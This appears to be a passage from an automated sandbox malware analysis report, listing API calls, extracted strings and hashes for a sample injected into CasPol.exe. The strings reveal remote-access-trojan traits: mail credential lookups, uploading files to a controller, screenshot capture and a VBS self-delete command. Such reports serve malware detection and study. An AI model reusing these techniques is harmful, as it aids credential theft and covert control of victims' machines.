  • Part of subcall function 04571CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 04571D37
  • Part of subcall function 04571CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D4B
• _strlen.LIBCMT ref: 04571855
• _strlen.LIBCMT ref: 04571869
• _strlen.LIBCMT ref: 0457188B
• _strlen.LIBCMT ref: 045718AE
• _strlen.LIBCMT ref: 045718C8
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: _strlen$File$CopyCreateDelete
• String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
• API String ID: 3296212668-3023110444
• Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction ID: 590da2b12ae7b6d15c5148ecf307b88f2dfb043fa21d54891ebdce5de41f28b1
• Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction Fuzzy Hash: 55614771D00619AAFF159BA4F840BDEBBB9BF85308F0044B6D104A7345DB707A46EF55
APIs
• lstrlenW.KERNEL32(?), ref: 0041B1D6
• _memcmp.LIBVCRUNTIME ref: 0041B1EE
• lstrlenW.KERNEL32(?), ref: 0041B207
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
• lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
• _wcslen.LIBCMT ref: 0041B2DB
• FindVolumeClose.KERNEL32(?), ref: 0041B2FB
• GetLastError.KERNEL32 ref: 0041B313
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
• lstrcatW.KERNEL32(?,?), ref: 0041B359
• lstrcpyW.KERNEL32(?,?), ref: 0041B368
• GetLastError.KERNEL32 ref: 0041B370
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040
• Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
• Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
• Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
• Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: _strlen
• String ID: %m$~$Gon~$~F@7$~dra
• API String ID: 4218353326-230879103
• Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction ID: 9391192956f4165443988981c1cc0532325790aa214baa2c7670f947a0709ca4
• Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction Fuzzy Hash: FA71F871D00629ABEF11ABB4A884ADF7FFCBF45304F1440E6E544D7241E674A785EBA0
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free$EnvironmentVariable$_wcschr
• String ID:
• API String ID: 3899193279-0
• Opcode ID: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
• Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
• Opcode Fuzzy Hash: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
• Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
• LoadLibraryA.KERNEL32(?), ref: 00413EC8
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
• FreeLibrary.KERNEL32(00000000), ref: 00413EEF
• LoadLibraryA.KERNEL32(?), ref: 00413F27
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
• FreeLibrary.KERNEL32(00000000), ref: 00413F40
• GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
• FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                                                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                                                                                                  • API String ID: 2490988753-744132762
                                                                                                                                                                                                                                  • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                                                                                                                                  • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseEnumOpen
                                                                                                                                                                                                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                                                                                                                  • API String ID: 1332880857-3714951968
                                                                                                                                                                                                                                  • Opcode ID: 949b7845c43138c00e5883570a82b221c4a2f0b2bf07859f710c2a5fc96e8881
                                                                                                                                                                                                                                  • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 949b7845c43138c00e5883570a82b221c4a2f0b2bf07859f710c2a5fc96e8881
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                                                                                                                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                                                                                                                                                  • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                                                                                                                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                                                                                                  • String ID: Close
                                                                                                                                                                                                                                  • API String ID: 1657328048-3535843008
                                                                                                                                                                                                                                  • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                                                                  • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$Info
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2509303402-0
                                                                                                                                                                                                                                  • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                                                                  • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                                                                                                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                                                                                                                                  • API String ID: 1884690901-3066803209
                                                                                                                                                                                                                                  • Opcode ID: a9200b904cd464026f7c52520259c68e7c52965eecdcfc832bab961b06e9d9d9
                                                                                                                                                                                                                                  • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9200b904cd464026f7c52520259c68e7c52965eecdcfc832bab961b06e9d9d9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
APIs
• Sleep.KERNEL32(00001388), ref: 00409E62
  • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
  • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
  • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
  • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
• GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
• String ID: @CG$@CG$XCG$XCG$xAG$xAG
• API String ID: 3795512280-3163867910
• Opcode ID: 3a21af93ee717603241ce7b1c9632469be16a929bed094211b5e0c5841bec558
• Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
• Opcode Fuzzy Hash: 3a21af93ee717603241ce7b1c9632469be16a929bed094211b5e0c5841bec558
• Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
APIs
• ___free_lconv_mon.LIBCMT ref: 04577D06
  • Part of subcall function 045790BA: _free.LIBCMT ref: 045790D7
  • Part of subcall function 045790BA: _free.LIBCMT ref: 045790E9
  • Part of subcall function 045790BA: _free.LIBCMT ref: 045790FB
  • Part of subcall function 045790BA: _free.LIBCMT ref: 0457910D
  • Part of subcall function 045790BA: _free.LIBCMT ref: 0457911F
  • Part of subcall function 045790BA: _free.LIBCMT ref: 04579131
  • Part of subcall function 045790BA: _free.LIBCMT ref: 04579143
  • Part of subcall function 045790BA: _free.LIBCMT ref: 04579155
  • Part of subcall function 045790BA: _free.LIBCMT ref: 04579167
  • Part of subcall function 045790BA: _free.LIBCMT ref: 04579179
  • Part of subcall function 045790BA: _free.LIBCMT ref: 0457918B
  • Part of subcall function 045790BA: _free.LIBCMT ref: 0457919D
  • Part of subcall function 045790BA: _free.LIBCMT ref: 045791AF
• _free.LIBCMT ref: 04577CFB
  • Part of subcall function 0457571E: HeapFree.KERNEL32(00000000,00000000,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?), ref: 04575734
  • Part of subcall function 0457571E: GetLastError.KERNEL32(?,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?,?), ref: 04575746
• _free.LIBCMT ref: 04577D1D
• _free.LIBCMT ref: 04577D32
• _free.LIBCMT ref: 04577D3D
• _free.LIBCMT ref: 04577D5F
• _free.LIBCMT ref: 04577D72
• _free.LIBCMT ref: 04577D80
• _free.LIBCMT ref: 04577D8B
• _free.LIBCMT ref: 04577DC3
• _free.LIBCMT ref: 04577DCA
• _free.LIBCMT ref: 04577DE7
• _free.LIBCMT ref: 04577DFF
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 656512a88584d8b9e76db144e5df2b47aa03922ea58e15ca9c283d0e50ae6278
• Instruction ID: a5ceb0a701e809c9f38e6af5010fdb8191e2a9203258e6953c8d3ef99ac8ba39
• Opcode Fuzzy Hash: 656512a88584d8b9e76db144e5df2b47aa03922ea58e15ca9c283d0e50ae6278
• Instruction Fuzzy Hash: BD314A71610209BFEB21AB38F844B6677E9FF84354F14847AE849DB550EE31B890EA14
APIs
• ___free_lconv_mon.LIBCMT ref: 004500B1
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
• _free.LIBCMT ref: 004500A6
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
• _free.LIBCMT ref: 004500C8
• _free.LIBCMT ref: 004500DD
• _free.LIBCMT ref: 004500E8
• _free.LIBCMT ref: 0045010A
• _free.LIBCMT ref: 0045011D
• _free.LIBCMT ref: 0045012B
• _free.LIBCMT ref: 00450136
• _free.LIBCMT ref: 0045016E
• _free.LIBCMT ref: 00450175
• _free.LIBCMT ref: 00450192
• _free.LIBCMT ref: 004501AA
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
• Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
• Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
• Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
APIs
• ___free_lconv_mon.LIBCMT ref: 1001A0C9
  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBB4
  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBC6
  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBD8
  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBEA
  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CBFC
  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC0E
  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC20
  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC32
  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC44
  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC56
  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC68
  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC7A
  • Part of subcall function 1001CB97: _free.LIBCMT ref: 1001CC8C
• _free.LIBCMT ref: 1001A0BE
  • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
  • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
• _free.LIBCMT ref: 1001A0E0
• _free.LIBCMT ref: 1001A0F5
• _free.LIBCMT ref: 1001A100
• _free.LIBCMT ref: 1001A122
• _free.LIBCMT ref: 1001A135
• _free.LIBCMT ref: 1001A143
• _free.LIBCMT ref: 1001A14E
• _free.LIBCMT ref: 1001A186
• _free.LIBCMT ref: 1001A18D
• _free.LIBCMT ref: 1001A1AA
• _free.LIBCMT ref: 1001A1C2
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
APIs
• __EH_prolog.LIBCMT ref: 0041912D
• GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
• Sleep.KERNEL32(000003E8), ref: 0041926D
• GetLocalTime.KERNEL32(?), ref: 0041927C
• Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
• String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
• API String ID: 489098229-65789007
APIs
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
• ExitProcess.KERNEL32 ref: 0040C832
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
• String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
• API String ID: 1913171305-390638927
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
  • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
• GetLastError.KERNEL32 ref: 00454A96
• __dosmaperr.LIBCMT ref: 00454A9D
• GetFileType.KERNEL32(00000000), ref: 00454AA9
• GetLastError.KERNEL32 ref: 00454AB3
• __dosmaperr.LIBCMT ref: 00454ABC
